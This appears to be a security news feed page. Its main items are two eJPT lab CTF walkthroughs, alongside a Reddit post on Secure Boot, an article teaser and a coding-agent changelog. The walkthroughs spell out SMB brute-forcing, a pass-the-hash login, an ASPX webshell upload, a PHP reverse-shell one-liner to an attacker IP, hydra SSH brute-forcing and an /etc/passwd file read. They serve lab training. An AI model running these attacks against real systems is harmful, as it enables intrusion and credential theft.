<content:encoded><![CDATA[<h4><em>A walkthrough covering SMB brute-forcing, Pass-the-Hash attacks, FTP credential reuse, and ASPX webshell upload to capture all four flags.</em></h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*WSgKYo-05kW30HkJVVXq6g.png"></figure><p>Hello everyone!</p><p>In this blog, I’ll walk through Exploitation CTF 2 from INE’s eJPT path. One Windows target, four flags — and if you read the questions carefully, each one actually unlocks the answer for the next. The lab is designed as a chain, and once you spot that pattern it flows naturally from start to finish.</p><p>So, let’s dive in.</p><h3>Q. Looks like SMB user tom has not changed his password from a very long time.</h3><p>As usual, I started with an Nmap scan and opened Metasploit in parallel:</p><pre>nmap -T4 -sV -O -sC target.ine.local<br>service postgresql start &amp;&amp; msfconsole -q -x "workspace -a win"</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*oJnLRDsDqaLK4PpVK7H9cA.png"></figure><p>The scan revealed several open ports — FTP on 21, HTTP on 80, SMB on 445, and RDP on 3389. The question was pointing directly at SMB and a user called tom with a weak password, so I loaded the smb_login auxiliary module and brute-forced it against the provided wordlist:</p><pre>use auxiliary/scanner/smb/smb_login<br>set rhosts target.ine.local<br>set smbuser tom<br>set pass_file /usr/share/wordlists/metasploit/unix_passwords.txt<br>run</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*b_DLaqLgziKlQRe_Xz4_xQ.png"></figure><p>Got it. With valid credentials, I listed the available SMB shares using smbmap:</p><pre>smbmap -H target.ine.local -u tom -p &lt;password&gt;</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/977/1*Qc5Dxk1rjL_Q_U_IsGAynQ.png"></figure><p>Tom had read access to HRDocuments. I connected and listed the contents:</p><pre>smbclient //target.ine.local/HRDocuments -U tom --password &lt;password&gt;<br>smb: \&gt; ls</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/863/1*F3bWrV817n3V-f0OT4Qf4A.png"></figure><p>Two files — flag1.txt and leaked-hashes.txt. Flag 1 captured, and the hashes file was clearly the hint for the next question.</p><h3>Q. Using the NTLM hash list discovered in the previous challenge, can you compromise the SMB user nancy?</h3><p>The leaked hashes file contained multiple NTLM hashes. The question pointed at user nancy, so instead of cracking the hashes I went straight to a Pass-the-Hash attack — using the hashes directly against SMB:</p><pre>use auxiliary/scanner/smb/smb_login<br>set rhosts target.ine.local<br>set smbuser nancy<br>set pass_file leaked-hashes.txt<br>run</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*0YA_XR_8hYJMxItbut_nYQ.png"></figure><p>One hash matched. For SMB authentication the format is &lt;LM_HASH&gt;:&lt;NT_HASH&gt; — only the NT portion matters. I used it to connect directly with --pw-nt-hash:</p><pre>smbclient //target.ine.local/ITResources -U nancy --pw-nt-hash &lt;NT_hash&gt;<br>smb: \&gt; ls</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*MvOt-06WrgwjE7d5prRexg.png"></figure><p>Two files inside — flag2.txt and hint.txt. Flag 2 captured. I grabbed the hint file:</p><pre>smb: \&gt; get hint.txt</pre><h3>Q. I wonder what the hint found in the previous challenge could be useful for!</h3><p>I opened the hint file:</p><pre>cat hint.txt</pre><p>It contained a set of credentials for a user called david. The Nmap scan had shown FTP open on port 21, so I tried them there:</p><pre>ftp ftp://david:&lt;password&gt;@target.ine.local</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/709/1*LtkWe_au8aCOkgAeNDz8pA.png"></figure><p>Logged in. Listing the FTP directory showed flag3.txt sitting right there alongside the default IIS files. Flag 3 captured.</p><h3>Q. Can you compromise the target machine and retrieve the C:\flag4.txt file?</h3><p>Still in the FTP session — and the FTP root appeared to be the IIS web root (same iisstart.htm and iis-85.png from the default IIS page). That meant anything uploaded via FTP would be accessible directly from the web server.</p><p>I uploaded an ASPX webshell:</p><pre>ftp&gt; put /usr/share/webshells/aspx/cmdasp.aspx cmd.aspx</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*ja1FUAcGICaVpg8kq4dXmA.png"></figure><p>Then opened it in the browser:</p><pre>http://target.ine.local/cmd.aspx</pre><p>The webshell gave me a command input field. I ran:</p><pre>type C:\flag4.txt</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*nVUJMoE-3SfE6-kUyL-zIQ.png"></figure><p>Flag 4 returned directly in the browser.</p><h3>Final Thoughts</h3><p>This CTF was well designed — each flag handed you exactly what you needed for the next one. Tom’s weak password gave the NTLM hashes. The hashes gave nancy’s access. Nancy’s share gave david’s credentials. David’s FTP session gave webshell upload, and the webshell gave the final flag.</p><p>The Pass-the-Hash step was the most interesting technically. You never need to crack an NTLM hash to use it — Windows authentication accepts the hash directly, which means a leaked hash file is often as good as a plaintext password list.</p><p>Thanks for reading!</p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=77fea8b4433d" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/host-network-penetration-testing-exploitation-ctf-2-ejpt-ine-77fea8b4433d">Host &amp; Network Penetration Testing: Exploitation CTF 2 — eJPT (INE)</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hypothetical: what if Microsoft pushes through Secure Boot mandate and does not allow shim files to run with Windows 12 in order to act as a "Linux killer" (but of course never says that is the reason)?]]></title>
<description><![CDATA[Even though Microsoft has done the opposite and said manufacturers must allow Secure Boot to be turned off, I have been thinking about Microsoft going down the route Apple has and saying to new computers "you must run Windows as your only operating system on hardware". There are no public indicat...]]></description>
<link>https://tsecurity.de/de/3644649/linux-tipps/hypothetical-what-if-microsoft-pushes-through-secure-boot-mandate-and-does-not-allow-shim-files-to-run-with-windows-12-in-order-to-act-as-a-linux-killer-but-of-course-never-says-that-is-the-reason/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3644649/linux-tipps/hypothetical-what-if-microsoft-pushes-through-secure-boot-mandate-and-does-not-allow-shim-files-to-run-with-windows-12-in-order-to-act-as-a-linux-killer-but-of-course-never-says-that-is-the-reason/</guid>
<pubDate>Sat, 04 Jul 2026 04:09:16 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>Even though Microsoft has done the opposite and said manufacturers must allow Secure Boot to be turned off, I have been thinking about Microsoft going down the route Apple has and saying to new computers "you <em>must</em> run Windows as your only operating system on hardware".</p> <p>There are no public indications or statements that suggest or show Microsoft is planning on this. However, last month, Microsoft let UEFI Secure Boot certificates expire, which many people feel is testing the waters for such a move. I feel such a move is plausible despite what I said, because Microsoft might see it as plugging a hole in people leaving Windows before it is too late, assuming the average person won't buy a new system or go through the hoops to force it off. I think such a move could go either way. Because on one hand unfortunately, most people are relatively tech illiterate, and on the other hand, there is an effect of secrecy.</p> <p>The key reason I think this is something people should consider as a possibility is this: it already exists on cell phones. I did some research and I found that such a mandate would be technically feasible but face more legal friction because cell phones are not classified as general purpose computing (though I think they should be because of how they evolved). Apple has done it to MacOS recently, making it very hard to install Linux on newer hardware. That is the reason I think a Microsoft push to block Linux (or any non-Microsoft OS for that matter) to run is something people should worry about.</p> <p>I am not ranting about this, I am just curious about how such a decision would affect Linux developers and core users, especially considering many Linux users strategically use Windows OEM hardware to reach discounts and often higher quality parts because the relative discounts of these manufacturers and the premiums they get often outweigh the cost of the licensing and hardware compatibility (TPM chips and the like), or are using them because they were passively using Windows for years until the software bloat got intolerable for them (or were missing the TPM chip or something else Windows 11 requires).</p> <p>I do not think they will do it because of the antitrust and bad press talking points. But I feel it is likely/plausible enough to consider for developers. Ultimately, I think that the reason they haven't tried this is that antitrust law issue.</p> <p>Here is a personal story: When I first bought my HP OmniBook X which now dual boots Ubuntu and Fedora, I got an error. I freaked out when I plugged in the Ventoy USB after seeing "Secure Boot Violation" or something like that. I was about to return it until I looked up if you could disable it. Fortunately you can. It <em>is</em> possible to run Linux through a backdoor Microsoft provided called shim which was created for that purpose. But that backdoor could be revoked in the future, and they could also potentially say "you can't sign your own keys" (which already seems to be the case on many of these machines, and even if it isn't it is yet another hoop to hop through).</p> <p>The bottom line: if it comes to this, will you switch to Linux certified laptops, keep old systems, or import from markets in Europe (the EU has digital sovereignty laws that would not like this) or somewhere else where Microsoft is forced to allow it off supply you those same hardware? Or something else?</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/DestroyRepublicans"> /u/DestroyRepublicans </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/1umqld4/hypothetical_what_if_microsoft_pushes_through/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1umqld4/hypothetical_what_if_microsoft_pushes_through/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[German AfD Party Campaign For Dirty Energy Helps Only Putin]]></title>
<description><![CDATA[The AfD are campaigning hard to bring back Hitler’s pre-1941 racist forced deportation platform (Nisko and Gurs), and also to block clean energy and make Germany more dependent on foreign states like Russia. Johannes Kieß, a researcher specialising in right-wing extremism at Leipzig University [e...]]></description>
<link>https://tsecurity.de/de/3644378/it-security-nachrichten/german-afd-party-campaign-for-dirty-energy-helps-only-putin/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3644378/it-security-nachrichten/german-afd-party-campaign-for-dirty-energy-helps-only-putin/</guid>
<pubDate>Fri, 03 Jul 2026 22:52:37 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The AfD are campaigning hard to bring back Hitler’s pre-1941 racist forced deportation platform (Nisko and Gurs), and also to block clean energy and make Germany more dependent on foreign states like Russia. Johannes Kieß, a researcher specialising in right-wing extremism at Leipzig University [explains why a Nazi agenda of the AfD isn’t the only … <a href="https://www.flyingpenguin.com/german-afd-party-campaign-for-dirty-energy-helps-only-putin/" class="more-link">Continue reading <span class="screen-reader-text">German AfD Party Campaign For Dirty Energy Helps Only Putin</span> <span class="meta-nav">→</span></a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Host & Network Penetration Testing: Exploitation CTF 1 — eJPT (INE)]]></title>
<description><![CDATA[A walkthrough covering flatCore CMS exploitation, SSH brute-forcing, WordPress plugin enumeration, and unauthenticated file read to capture all four flags.Hello everyone!In this blog, I’ll walk through Exploitation CTF 1 from INE’s eJPT path. Two Linux targets running different web applications —...]]></description>
<link>https://tsecurity.de/de/3643712/hacking/host-network-penetration-testing-exploitation-ctf-1-ejpt-ine/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3643712/hacking/host-network-penetration-testing-exploitation-ctf-1-ejpt-ine/</guid>
<pubDate>Fri, 03 Jul 2026 15:37:11 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h4><em>A walkthrough covering flatCore CMS exploitation, SSH brute-forcing, WordPress plugin enumeration, and unauthenticated file read to capture all four flags.</em></h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*e4AoQhhAgvvMjiR7Qi0gaQ.png"></figure><p>Hello everyone!</p><p>In this blog, I’ll walk through Exploitation CTF 1 from INE’s eJPT path. Two Linux targets running different web applications — flatCore CMS and WordPress — each with their own vulnerable plugin or exploit path. The flags are formatted as MD5 hashes, and the lab gives us a head start with one set of credentials.</p><p>So, let’s dive in.</p><h3>Q. Identify and exploit the vulnerable web application running on target1.ine.local and retrieve the flag from the root directory. The credentials admin:password1 may be useful.</h3><p>As usual, I started with an Nmap scan:</p><pre>nmap -sV -O target1.ine.local</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*6Z_QMJbMqMs8vCYT5XT6aw.png"></figure><p>Port 80 and 22 were open. I checked out the website running on port 80 and found a login page in what looked like German — turned out to be <strong>flatCore CMS</strong>.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*3WwSZH_6u-ASJjHd09KFlQ.png"></figure><p>I tried the credentials given in the question — admin:password1 — and they worked.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*tsYadn9DPzB6ZogjWCqQhA.png"></figure><p>I checked robots.txt and found /acp/ listed under Disallow. Navigated there directly.</p><p>It was the CMS admin login page. I tried the same credentials there too, and got into the admin panel.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*KMTwo1o9Pv0sjsey42pYhg.png"><figcaption>CMS login page</figcaption></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*p006r3I_IsCmrFD6STLKqA.png"></figure><p>With confirmed access to flatCore CMS, I searched for known exploits:</p><pre>searchsploit flatcore cms</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1023/1*Xb9gss0rJBH_32vikUE27w.png"></figure><p>Found an authenticated exploit — and since we already have valid admin credentials, that requirement was already satisfied. I set it up and ran it with Python 3.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/738/1*1Pli0gJS6nMEAyq1nZVpXQ.png"></figure><p>A shell popped, and the first flag was sitting right there.</p><h3>Q. Further, identify and compromise an insecure system user on target1.ine.local.</h3><p>Still in that shell, I wanted to bring it into Metasploit for easier post-exploitation. I started a multi/handler listener, then triggered a reverse shell back to it using a PHP one-liner generated from revshells.com:</p><pre>php -r '$sock=fsockopen("&lt;your-ip&gt;",&lt;port&gt;);exec("sh &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3");'</pre><p>Once the shell connected, I upgraded it to a full Meterpreter session:</p><pre>sessions -u &lt;id&gt;</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*pBA-akGfmnIqKzPxB-GgfQ.png"></figure><p>Inside the Meterpreter session, I found a user called iamaweakuser with a home directory — but no permission to read into it. The username itself was a strong hint, so I brute-forced SSH against that account:</p><pre>hydra -l iamaweakuser -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt target1.ine.local ssh</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*AmKI9xNtfWoMARMfsynslA.png"></figure><p>Hydra found the password. Logging in over SSH with those credentials gave me Flag 2.</p><h3>Q. Identify and exploit the vulnerable plugin used by the web application running on target2.ine.local and retrieve the flag3.txt file from the root directory.</h3><p>Moved to the second target with a fresh Nmap scan, this time including default scripts:</p><pre>nmap -sV -sC target2.ine.local</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*eKvIk0WNx5NBLYqIk4LYFQ.png"></figure><p>Port 22 and 80 were open, with port 80 running <strong>WordPress</strong>. Since the question specifically asked about a vulnerable plugin, I enumerated installed plugins:</p><pre>nmap -sV -p 80 target2.ine.local --script=http-wordpress-enum</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Ssr6ONAHI3umfQfA_29Z3A.png"></figure><p>Two plugins came back — akismet 5.0.1 and duplicator 1.3.26. I searched both for known vulnerabilities and found that <strong>Duplicator 1.3.26</strong> is affected by an unauthenticated arbitrary file download / directory traversal vulnerability — and Metasploit already had a module for it.</p><p>I loaded it up and set the filepath to grab the flag directly:</p><pre>use auxiliary/scanner/http/wp_duplicator_file_read<br>set rhosts target2.ine.local<br>set filepath /flag3.txt<br>run</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*6b-0KUYU2uLW9rsbrwLynQ.png"></figure><p>The file came back with Flag 3 inside it — no authentication required at any point.</p><h3>Q. Further, identify and compromise a system user requiring no authentication on target2.ine.local.</h3><p>Using the same module, I changed the target file to pull system user information instead:</p><pre>set filepath /etc/passwd<br>run</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1012/1*gYNWTRUYvv_G2Mv4wmDxzg.png"></figure><p>Scrolling through the output, one account stood out from the standard system accounts — iamacrazyfreeuser, with a real home directory and shell access. The username was the giveaway. I tried SSH with no password at all:</p><pre>ssh iamacrazyfreeuser@target2.ine.local</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/865/1*0GS6_-vXqDL0S6wYXQ1sxA.png"></figure><p>No authentication required — straight in, and Flag 4 was waiting.</p><h3>Final Thoughts</h3><p>This CTF was a solid mix of web app exploitation and credential-based attacks across two different CMS platforms.</p><p>The Duplicator plugin vulnerability stood out the most — an unauthenticated arbitrary file read is a serious finding on its own, and here it directly handed over both the flag and the /etc/passwd file needed for the next step, no exploitation chain required. On the flatCore side, the lesson was simpler but just as common in real engagements: weak or default credentials, once again, were the way in.</p><p>Thanks for reading!</p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=e675eabf7f0c" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/host-network-penetration-testing-exploitation-ctf-1-ejpt-ine-e675eabf7f0c">Host &amp; Network Penetration Testing: Exploitation CTF 1 — eJPT (INE)</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[v16.3.2]]></title>
<description><![CDATA[@oh-my-pi/pi-ai
Changed

Removed automated injection of reasoning suppression prompts in OpenAI responses

@oh-my-pi/pi-catalog
Fixed

Fixed ZenMux model discovery to run without a ZENMUX_API_KEY, so newly published ZenMux models (for example anthropic/claude-fable-5-free) auto-update into the ru...]]></description>
<link>https://tsecurity.de/de/3641723/tools/v1632/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3641723/tools/v1632/</guid>
<pubDate>Thu, 02 Jul 2026 18:26:02 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>@oh-my-pi/pi-ai</h2>
<h3>Changed</h3>
<ul>
<li>Removed automated injection of reasoning suppression prompts in OpenAI responses</li>
</ul>
<h2>@oh-my-pi/pi-catalog</h2>
<h3>Fixed</h3>
<ul>
<li>Fixed ZenMux model discovery to run without a <code>ZENMUX_API_KEY</code>, so newly published ZenMux models (for example <code>anthropic/claude-fable-5-free</code>) auto-update into the runtime <code>models.db</code> cache instead of waiting on a regenerated <code>models.json</code>.</li>
<li>Fixed ZenMux runtime discovery to query the <code>/api/v1/models</code> endpoint even when the resolved provider base URL points at the Anthropic-compatible route, so discovery no longer requests a non-existent <code>/api/anthropic/models</code> path.</li>
</ul>
<h3>Removed</h3>
<ul>
<li>Removed reasoning suppression prompt logic for GPT-5 models</li>
</ul>
<h2>@oh-my-pi/pi-coding-agent</h2>
<h3>Breaking Changes</h3>
<ul>
<li>Changed search tool <code>paths</code> parameter to a single semicolon-delimited <code>path</code> string parameter</li>
<li>Changed the <code>grep</code>, <code>glob</code>, and <code>ast_grep</code> tools to take a single optional <code>path</code> argument instead of a <code>paths</code> array. <code>path</code> accepts one path or a semicolon-delimited list (<code>src; tests</code>); omitting it searches the workspace root (<code>.</code>). Multi-path search, delimited expansion, and internal-URL scopes are unchanged. (<code>ast_edit</code> continues to take <code>paths</code>.)</li>
</ul>
<h3>Added</h3>
<ul>
<li>Added <code>speech.enhanced</code> setting to rewrite assistant output into natural spoken prose</li>
<li>Added <code>speech.enhanced</code> setting: assistant output is rewritten into natural spoken prose by the tiny/smol model before synthesis — code blocks become one-clause descriptions, links speak their label or site name, numbers and symbols read naturally, lists become flowing sentences. Blocks are rewritten fence-aware and coalesced (bounded to two concurrent completions); any failed or timed-out rewrite falls back to the mechanical cleanup so speech never blocks on the model.</li>
</ul>
<h3>Changed</h3>
<ul>
<li>Reduced extension startup cost, especially on Windows, by reading each extension source-graph module from disk once per load instead of twice (the graph scan now feeds the load-time rewrite hook) (<a href="https://github.com/can1357/oh-my-pi/issues/4196" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/4196/hovercard">#4196</a>).</li>
<li>Redesigned speech vocalization for low latency and clean spoken content. Assistant markdown now runs through a speakable-text pipeline before synthesis: code blocks and tables are silent, links speak their label, bare URLs speak their host, inline-code ticks/emphasis/heading/bullet markers are stripped, and long file paths collapse to their basename. Segmentation is now parent-side and emits at sentence boundaries immediately (the previous engine-side splitter held each sentence until the next one arrived), with clause-level cuts for long sentences and an idle flush when generation stalls mid-sentence. macOS gains a gapless streaming playback backend (ffmpeg AudioToolbox, sox fallback) instead of spawning <code>afplay</code> per sentence.</li>
</ul>
<h3>Fixed</h3>
<ul>
<li>Fixed ALL-CAPS acronyms (e.g. <code>CNPG</code>, <code>ETL</code>, <code>JWT</code>) being lowered to title case in auto-generated session titles. <code>reconcileTitleCasing</code> (<code>packages/coding-agent/src/tiny/text.ts</code>) now maps ALL-CAPS source tokens into an <code>acronyms</code> table and restores them when the model produces a title-cased artifact (<code>Cnpg</code>), while still declining restoration on shouty input (<code>FIX the BUG NOW</code>, <code>ALL ERROR HANDLING</code>) via a consecutive-ALL-CAPS heuristic. Title prompts also instruct the model to preserve ALL-CAPS acronyms verbatim. (<a href="https://github.com/can1357/oh-my-pi/issues/4220" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/4220/hovercard">#4220</a>)</li>
<li>Fixed cold-start <code>--model</code> resolution for extension providers whose catalogs come only from <code>fetchDynamicModels</code>, so fresh cached runtime models are available before session startup falls back or hard-fails. (<a href="https://github.com/can1357/oh-my-pi/issues/4216" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/4216/hovercard">#4216</a>)</li>
<li>Fixed plugin and legacy extension discovery repeatedly re-reading plugin manifests and walking extension <code>node_modules</code> by caching results until plugin cache invalidation. (<a href="https://github.com/can1357/oh-my-pi/issues/4197" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/4197/hovercard">#4197</a>)</li>
<li>Fixed <code>discoverExtensionPaths</code> invoking every registered extension-module provider (claude, codex, gemini, opencode) on startup and discarding all non-native results. The extension-module capability is now loaded with <code>providers: ["native"]</code>, skipping four foreign directory walks per session — noticeable on Windows where the walks are slowest (<a href="https://github.com/can1357/oh-my-pi/issues/4198" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/4198/hovercard">#4198</a>).</li>
<li>Fixed <code>/move</code> overlay running an <code>fs.statSync</code> per directory entry per keystroke; the directory listing cache now stores <code>Dirent[]</code> and classifies entries without a syscall, falling back to <code>statSync</code> only for symlink entries (<a href="https://github.com/can1357/oh-my-pi/issues/4199" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/4199/hovercard">#4199</a>).</li>
<li>Fixed default model switches being persisted without changing the active goal-mode session when the current context exceeded the target model window. (<a href="https://github.com/can1357/oh-my-pi/issues/4219" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/4219/hovercard">#4219</a>)</li>
<li>Fixed live tool preview spinners staying pinned to their first frame for <code>eval</code> and shell-style renderers. (<a href="https://github.com/can1357/oh-my-pi/issues/4170" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/4170/hovercard">#4170</a>)</li>
<li>Fixed isolated task merges failing when the parent working tree carried WIP for a file the isolated subagent also touched. <code>commitPatchToBranchWorktree</code> now tries plain apply and <code>git apply --3way</code> first (agent-only outcome when the WIP-side blob is tracked in HEAD), then falls back to seeding the temp worktree with the baseline WIP so the delta patch's HEAD+WIP context matches, and rewinds WIP-only files afterward so they don't leak into the branch commit. Covers untracked WIP files, staged-new WIP files, and overlaps <code>--3way</code> cannot resolve. (<a href="https://github.com/can1357/oh-my-pi/issues/4136" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/4136/hovercard">#4136</a>)</li>
<li>Fixed <code>discoverAgents()</code> skipping <code>agents/</code> subdirectories inside OMP extension packages, so agents shipped by <code>omp plugin install</code>-ed npm plugins (e.g. <code>loom</code>) and <code>--extension</code>/<code>extensions:</code> settings roots now load the same way their sibling <code>skills/</code>, <code>hooks/</code>, <code>tools/</code> directories already do. The new scan goes through <code>listOmpExtensionRoots</code>, so Claude marketplace installs continue to flow through the <code>claude-plugins</code> provider without being double-counted. (<a href="https://github.com/can1357/oh-my-pi/issues/3920" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/3920/hovercard">#3920</a>)</li>
<li>Fixed plan mode hanging without converging on <code>ask</code>/<code>resolve</code> after advisor cards, idle IRC messages, or follow-on turns. Plan-mode decision enforcement ran on only the non-synthetic <code>prompt()</code> return; continuation/wake paths settled via <code>agent_end</code> and bypassed it. Advisor cards and idle IRC are now recorded into context without waking an autonomous turn, and the <code>ask</code>/<code>resolve</code> decision is enforced at the universal <code>agent_end</code> terminal settle via a bounded-retry counter (provider-neutral <code>required</code>, both tools kept available) that reminds-then-forces a fixed number of times and then yields to the user — never looping, never silently ending plan mode un-converged. An <code>irc send await:true</code> to an idle plan-mode session now answers the sender through the existing ephemeral side-channel auto-reply instead of stranding it until its wait timeout, and a queued forced plan decision is dropped when its continuation is skipped or plan mode exits. (<a href="https://github.com/can1357/oh-my-pi/issues/3910" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/3910/hovercard">#3910</a>)</li>
<li>Reduced subagent streaming CPU cost: the recent-output window no longer re-splits the full (up to 8 KB) tail on every streamed text token. Fragments without a newline extend the current last line in place, and a full recompute runs only when line boundaries actually change.</li>
<li>Reduced task-render CPU cost: the task result frame (repainted ~30×/sec via the spinner) previously did 7+ full passes over the result set (<code>some</code>/<code>filter</code>/<code>reduce</code>); a single pass now derives the status booleans, footer counts, and request total, and incremental review extraction reuses the yield data the caller already normalized instead of re-normalizing it.</li>
<li>Reduced model-resolution cost: <code>resolveModelRoleValue</code> now builds the preference context (an O(n) model-order map over all available models) once and reuses it across every fallback pattern instead of rebuilding it per pattern, and <code>matchModel</code> hoists the case-folded pattern once instead of <code>.toLowerCase()</code>-ing it for every candidate across each filter pass.</li>
<li>Reduced read-tool allocation: line counting counts newlines directly instead of allocating via <code>split("\n")</code>, and the hashline formatter no longer counts the same content twice.</li>
<li>Fixed the assistant-message streaming fast path dropping the transient flag, which disabled the transient render path (code-highlight skip and streaming prefix caches) on every same-shape streaming tick. In-flight renders now correctly skip per-tick syntax highlighting; highlighting applies once at message finalization.</li>
<li>Fixed hidden goal-mode todo context: phase names and task text are now sanitized before prompt injection (no raw newlines or control characters forging extra context lines), and the block is only rendered with tool-accurate guidance when the <code>todo</code> tool is active or discoverable instead of unconditionally instructing the agent to call an unavailable tool.</li>
<li>Fixed custom tool loading treating <code>process.exit()</code> from a tool module's import or factory as a host process exit instead of a recoverable load failure. Custom tools now load under the shared extension exit guard, so an exiting tool is skipped with a load error while remaining tools still load (<a href="https://github.com/can1357/oh-my-pi/issues/1704" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/1704/hovercard">#1704</a>).</li>
<li>Fixed stuttering/latency in speech by running synthesis chunks through the player gaplessly</li>
<li>Fixed race condition causing EPIPE errors and broken pipes during speech playback</li>
<li>Fixed interrupted speech audio by ensuring segments queue and drain in order</li>
<li>Fixed speech vocalization starting only after the entire reply was synthesized: ONNX inference blocks the TTS worker's event loop, so per-segment IPC audio chunks queued unflushed and arrived in one burst. Streaming sends now drain the IPC channel before the next segment's inference, cutting time-to-first-audio to ~1.5s regardless of reply length.</li>
<li>Fixed an unhandled <code>EPIPE: broken pipe, write</code> rejection at the end of speech playback: the streaming player's <code>stop()</code> raced an un-awaited <code>FileSink.end()</code> against the backend SIGKILL, and mid-session writes never awaited the flush. Writes now await the flush (so a dead backend is detected and the chunk replays on the next candidate or the per-file path) and <code>stop()</code> swallows the expected teardown rejection.</li>
</ul>
<h2>@oh-my-pi/collab-web</h2>
<h3>Changed</h3>
<ul>
<li>Updated the glob, grep, and ast_grep tool cards to read the new single <code>path</code> argument, falling back to the legacy <code>paths</code> array so historical transcripts still render their search scope.</li>
</ul>
<h2>@oh-my-pi/omp-stats</h2>
<h3>Added</h3>
<ul>
<li>Added a Tools tab to the <code>omp stats</code> dashboard (<code>/#/tools</code>): per-tool call counts, error rates, result/argument payload sizes, per-model breakdown, and a stacked calls-over-time chart. Token and cost columns attribute each invoking turn's real provider usage evenly across that turn's tool calls. Existing databases re-parse sessions once on the next sync to backfill historical tool calls.</li>
</ul>
<h2>@oh-my-pi/pi-utils</h2>
<h3>Fixed</h3>
<ul>
<li>Fixed <code>parseJsonWithRepair</code> failing tool calls whose streamed arguments contain an unquoted string value (e.g. <code>{"paths": packages/foo/*, "i": "…"}</code>). Final parsing now recovers such barewords in object/array value position as strings, terminating at <code>,</code> / <code>}</code> / <code>]</code> / newline. Recovery deliberately refuses anything that could mask real structure or bad data — truncated values, tokens containing <code>"</code> / <code>{</code> / <code>[</code> or a key-like <code>:</code> (URL <code>://</code> and Windows <code>:\</code> colons stay literal), and non-finite atoms (<code>NaN</code>, <code>Infinity</code>, <code>undefined</code>) — and streaming partial parses still roll back unfinished barewords instead of committing them.</li>
</ul>
<h2>What's Changed</h2>
<ul>
<li>Fix todo HUD and goal context follow-ups by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jeffscottward/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jeffscottward">@jeffscottward</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4764619447" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/3777" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/3777/hovercard" href="https://github.com/can1357/oh-my-pi/pull/3777">#3777</a></li>
